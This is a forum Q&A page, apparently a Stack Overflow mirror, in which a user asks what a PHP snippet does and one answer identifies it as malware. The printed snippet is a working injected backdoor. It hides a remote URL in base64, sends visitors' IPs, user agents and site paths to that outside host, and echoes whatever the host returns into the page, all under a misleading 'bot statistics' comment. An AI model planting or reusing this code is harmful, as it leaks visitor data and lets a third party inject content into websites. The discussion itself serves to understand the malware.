CODEWITHSUNDEEP
php
user3522371
user3522371

Reputation:

GET parameters not displayed

I came across this script that is apparently famous as far as 2010. I want to test it and understand its function.

I created a file in which I echo all the parameters of IP: but no one of them is visible !

My question is why ? And what does this script do after all ?

P.S. I googled about it, but I did not find any real and convincing explanation of what this code does. 

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Seek for the type of the browser that requested the page by checking the header of User_Agent
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Upvotes: 0

Views: 104

Answers (1)

flauntster
flauntster

Reputation: 2016

The code looks to be part of some malware that posts data to the URL link, which is base64 encoded in that script.

I'd say it's to notify the creator of the malware of where the script has managed to be installed.

Upvotes: 1

Related Questions